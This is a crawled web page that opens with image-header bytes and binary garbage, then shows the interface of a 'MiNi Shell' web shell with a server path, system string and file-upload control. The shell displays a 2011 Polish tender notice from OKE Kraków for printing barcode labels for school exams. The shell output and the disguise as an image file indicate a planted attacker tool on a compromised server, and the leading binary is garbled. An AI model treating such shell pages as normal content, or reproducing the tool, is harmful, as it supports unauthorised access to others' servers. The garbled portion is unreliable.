JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110225/66353-N-2011.html

<p class="kh_header"><b>Kraków: Etykiety kodowe z nadrukiem</b><br>
<b>Numer ogłoszenia: 66353 - 2011; data zamieszczenia: 25.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowa Komisja Egzaminacyjna w Krakowie , Os. Szkolne 37, 31-978 Kraków, woj. małopolskie, tel. 12 68 32 101,102, faks 12 68 32 100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www,oke.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka budżetowa nadzorowana przez MEN, utworzona na podstawie ustawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Etykiety kodowe z nadrukiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk, konfekcjonowanie i dostawa na miejsce wskazane przez OKE w Krakowie, ok. 3962255 szt. różnych spersonalizowanych etykiet samoprzylepnych zadrukowanych kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych na terenie objętym działaniem OKE w Krakowie w 2011 r. (część zamówienia dotyczy również egzaminu zawodowego przeprowadzanego w 2012 r.). 
Numery i odpowiadające im kody kreskowe powinny być wydrukowane na papierowych, półmatowych etykietach samoprzylepnych, na drukarkach termo transferowych o rozdzielczości 300 dpi lub równoważnych, zapewniających trwałość i jakość nadruku odpowiednią dla późniejszego skanowania.
Dla uzyskania pewności dobrej jakości druku, pozwalającego na bezbłędny odczyt kodu przez skanery, należy zastosować urządzenia do weryfikacji poprawności wydruku kodu kreskowego na etapie wykonania.
Zamawiający sugeruje wykonanie druku etykiet w dwóch rzędach na arkuszach, co ilustruje przykładowy wygląd fragmentu arkusza z etykietami, dla ucznia przystępującego do egzaminu maturalnego, stanowiący załącznik nr 5 do SIWZ. 
Opis przedmiotu zamówienia dotyczy podanych niżej akcji: 
(opis dotyczy szacunkowej liczby etykiet ustalonej na dzień sporządzenia SIWZ. W każdym z opisanych przypadków Wykonawca ustala ostateczną liczbę etykiet i szkół na podstawie uzyskanej od Zamawiającego bazy danych)
 1.	AKCJA SPRAWDZIAN 
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
1.1. Dla uczniów: ok. 321980 szt. etykiet o wymiarach 5 x 4 cm na złożonych do wymiaru kopert arkuszach, po 4 szt. etykiet, które otrzyma każdy  z ok. 80495 uczniów przystępujących do sprawdzianu w ok. 3337 szkołach. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy  zawierać będzie etykiety z dwoma rodzajami nadruku w tym:
-1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
-3 etykiety z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-bez odcinania arkusików dla każdego ucznia.
1.2. Dla szkół: ok. 140154 szt. etykiet o wymiarach 5 x 4 cm na osobnych złożonych do wymiaru kopert arkuszach z 42 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji szkół. Każdy z ok. 3337 arkuszy zawierać będzie etykiety, z nadrukiem wynikającym z tej samej jw. bazy danych Zamawiającego w tym:
-	1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
-	41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
1.3. Ok. 3337 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na kopertę/koperty zawierające wyżej opisane etykiety. 

2.	AKCJA GIMNAZJUM
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
2.1.Dla uczniów: ok. 715504 szt. etykiet o wymiarach 5 x 4 cm na złożonych do wymiaru kopert  arkuszach, po 8 szt. etykiet, które otrzyma każdy  z ok. 89438  uczniów przystępujących do trzech części egzaminu gimnazjalnego w ok. 1751 szkołach. Ostateczna liczba szkół 
i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy zawierać będzie etykiety z dwoma rodzajami nadruku w tym:
-	1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
-	7 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-bez odcinania arkusików dla każdego ucznia.

2.2. Dla szkół: ok. 73542 szt. etykiet o wymiarach 5 x 4 cm na osobnych złożonych do wymiaru kopert arkuszach z 42 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji szkół. Każdy z ok. 1751 arkuszy zawierać będzie etykiety wykonane z nadrukiem wynikającym z tej samej bazy danych Zamawiającego w tym:
-	1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
-	41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
2.3. Ok. 1751 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na kopertę/koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie etykiet dla akcji z poz. 1 i 2:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm) zawierającą ujawnione dane identyfikacyjne szkoły, tożsame z zawartymi w niej etykietami z kodem kreskowym. Dla większej liczby kopert dla jednej szkoły, należy wprowadzić  oznaczenie liczby kopert, które może mieć postać np. 1z 2, 2 z 2.
-	Koperty pakowane będą w określonej kolejności, zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego, do pudeł dostosowanych do zawartości (dobór i zakup pudeł należy do Wykonawcy zamówienia). Pudła należy opisać danymi adresowymi Punktu Odbioru Prac i ewentualnie numerem kolejnym, gdy będzie więcej pudeł dla tego samego POP-u (dla 2 pudeł oznaczenie może mieć postać 1 z 2, 2 z 2).
- 	Pudła z kopertami należy dostarczyć na koszt Wykonawcy do wskazanych przez Zamawiającego miejsc w nieprzekraczalnym terminie wykonania zamówienia. (Wstępne dane adresowe dla 67 POP-ów sprawdzianu i egzaminu gimnazjalnego zawiera załącznik nr 8 do SIWZ). 
Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest podwykonawcom. 

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert (w czasie transportu i przed ich przekazaniem szkołom) z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Termin wymagany wykonania zamówienia dla sprawdzianu i egzaminu gimnazjalnego wg punktu 1 i 2 jw.: - 16 marzec 2011 r. (w tym dniu etykiety kodowe dla sprawdzianu i egzaminu gimnazjalnego będą wydawane w POP-ach).

3.	AKCJA MATURA  
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego: 
3.1. Dla uczniów : ok. 2114360 szt. etykiet o wymiarach 5 x 4 cm na arkuszach, po 20 szt., które otrzyma każdy z ok. 105718 uczniów przystępujący do egzaminu maturalnego, w ok. 1636 szkołach ponadgimnazjalnych. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy  zawierać będzie etykiety 
z dwoma rodzajami nadruku w tym:
-	1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
-	19 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-odcięte 20 szt. dla każdego ucznia.

3.2. Dla szkół: ok. 160328 szt. etykiet o wymiarach 5 x 4 cm na osobnych arkuszach po 98 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji  1636 szkół. Arkusze zawierać będą etykiety z nadrukiem wynikającym z tej samej bazy danych Zamawiającego w tym:
-	1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
-	97 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
3.3.	Ok. 1636 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie etykiet dla akcji z poz. 3:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm) zawierającą ujawnione dane identyfikacyjne szkoły, tożsame z zawartymi w niej etykietami z kodem kreskowym. Dla większej liczby kopert dla jednej szkoły, należy wprowadzić  oznaczenie liczby kopert, które może mieć postać np. 1z 2, 2 z 2.
-	Koperty pakowane będą w określonej kolejności, zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego, do pudeł dostosowanych do zawartości (dobór i zakup pudeł należy do Wykonawcy zamówienia). Pudła należy opisać danymi adresowymi Punktu Odbioru Prac i ewentualnie numerem kolejnym, gdy będzie więcej pudeł dla tego samego POP-u (dla 2 pudeł oznaczenie może mieć postać 1 z 2, 2 z 2).
- 	Pudła z kopertami należy dostarczyć na koszt Wykonawcy do wskazanych przez Zamawiającego miejsc w nieprzekraczalnym terminie określonym poniżej. (Wstępne dane adresowe dla 61 POP-ów maturalnych zawiera załącznik nr 8 do SIWZ). 
Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest firmom kurierskim. 

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert (w czasie transportu i przed ich przekazaniem szkołom) z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Termin wykonania zamówienia dla egzaminu maturalnego:  - 21 kwiecień 2011 r.  (w tym dniu etykiety kodowe dla egzaminu maturalnego będą wydawane w POP-ach)

4.	AKCJA EGZAMIN ZAWODOWY 
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego dla etapu pisemnego i praktycznego egzaminu:

4.1. Dla uczniów: ok. 380250 szt. etykiet o wymiarach 5 x 4 cm na arkuszach:
- po 2 szt., dla etapu pisemnego egzaminu w tym:
-	1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
-	1 szt. z kodem numerycznym szkoły, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi i napisem - OKE Kraków-,

- po 4 szt. dla etapu praktycznego egzaminu w tym:
-	1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
-	3 szt. z kodem numerycznym ośrodka, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi i napisem - OKE Kraków-,
które otrzyma każdy z ok. 63375 uczniów przystępujący do egzaminu pisemnego i praktycznego w 2353 szkołach zawodowych i ośrodkach egzaminacyjnych.
Uwaga: Etykiety mają być dostarczone w arkuszach złożonych do formatu koperty bez odcinania ich dla każdego ucznia. 		
 
4.2. Dla szkół i ośrodków: ok. 47060 szt. etykiet o wymiarach 5 x 4 cm na osobnych arkuszach po 20 szt., które przeznaczone są dla dyrekcji szkół. Każdy z ok. 2353 arkuszy zawierać będzie etykiety z  numerem i kodem kreskowym szkoły lub ośrodka w tym:
-	1 etykieta z ujawnionymi danymi identyfikującymi szkołę lub ośrodek,
-	19 etykiet z kodem numerycznym szkoły lub ośrodka i odpowiadającym mu kodem kreskowym i napisem - OKE Kraków-.

4.3. Ok. 2353 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty 
z zawartością etykiet, opisanych wyżej.
Uwaga: Na etykietach dla egzaminu zawodowego napis o treści - OKE Kraków- należy umieścić w dowolnym miejscu etykiety.		

Konfekcjonowanie etykiet dla akcji z poz. 4:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm). Całość materiałów tego zadania zapakowana zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego do pudeł (dobór i zakup pudeł należy do Wykonawcy zamówienia) dostarczona zostanie do szkół, zespołów szkół lub ośrodków egzaminacyjnych. Koperty przeznaczone dla szkół i ośrodków, które posiadają wspólny adres wskazujący, że jest to zespół szkół, należy dostarczyć w jednej przesyłce. Do kalkulacji ceny etykiet dla egzaminu zawodowego należy uwzględnić wysyłkę do 2353 szkół lub ośrodków.

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert w czasie transportu i przed ich przekazaniem szkołom z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest firmom kurierskim. 

Termin wykonania zamówienia dla egzaminu zawodowego :  
- w sesji letniej 2011 - III dekada maja 2011,
- sesja zimowa 2012 - III dekada grudnia 2011. 

Uściślenie terminu wykonania i ew. sposobu konfekcjonowania dokonane zostanie po przekazaniu przez Zamawiającego bazy danych do druku etykiet kodowych co nastąpi na minimum 7 dni przed wymaganym terminem realizacji.
       
W ramach niniejszego zamówienia Wykonawca zobowiązany będzie wykonać - o ile zaistnieje taka potrzeba - etykiety kodowe przeznaczone dla uczniów przystępujących do egzaminów w dodatkowych terminach, jak również dodrukować etykiety, których nie wydrukowano w terminie określonym w SIWZ.
W przypadku jakichkolwiek uchybień w wykonaniu zamówienia, które skutkowałyby zakłóceniem toku egzaminów przeprowadzanych z użyciem opisanych wyżej etykiet kodowych, Zamawiający zastrzega sobie możliwość wystąpienia z roszczeniem o stosowne odszkodowanie. 

Wykonawca zobowiązany jest do przestrzegania obowiązujących przepisów prawa 
w zakresie ochrony danych osobowych i niewykorzystywania uzyskanej od Zamawiającego bazy danych do innych celów niż wydruk etykiet kodowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w przypadku wystąpienia dodatkowego zapotrzebowania na etykiety kodowe w tym wykraczające poza zakres objęty postępowaniem a związanego z potrzebami OKE w Krakowie</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.61-2, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie.
Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia Zamawiający, żąda by Wykonawca wykazał, iż wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 3 usługi drukowania i dostawy etykiet kodowych, przy uzyskaniu przychodu ze świadczenia takich usług w łącznej wysokości nie mniejszej niż 60000 zł brutto w tym okresie (przykładowo: wykonanie w okresie 3 lat w każdym z kolejnych lat jednej usługi za nie mniej niż 20 000 zł brutto każda, stanowi o spełnieniu wymaganego warunku).
Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia w wykazie informacji wg załącznika nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie.
Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie.
Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie.
Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz ofertowy zawierający wymaganą do ważności oferty treść wg wzoru przedstawionego w załączniku nr 1 do SIWZ wraz z załącznikiem nr 2 do SIWZ - Formularzem cenowym, który należy poprawnie wyliczyć. 
2.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę (w formie oryginału, lub kopii poświadczonej za zgodność z oryginałem) - jeżeli są wymagane dla ważności oferty, zgodnie z aktem rejestracyjnym, wymaganiami ustawowymi oraz przepisami prawa.
3.Pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia, jeżeli Wykonawca będzie polegał na wiedzy, doświadczeniu, potencjale technicznym i osobach zdolnych do wykonania zamówienia, lub zdolnościach innych podmiotów.
Uwaga: Oświadczenie Wykonawcy określone w punkcie III.4.1 ogłoszenia dot. wykazu wykonanych usług, należy złożyć w zakresie opisanym w SIWZ wg załącznika nr 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
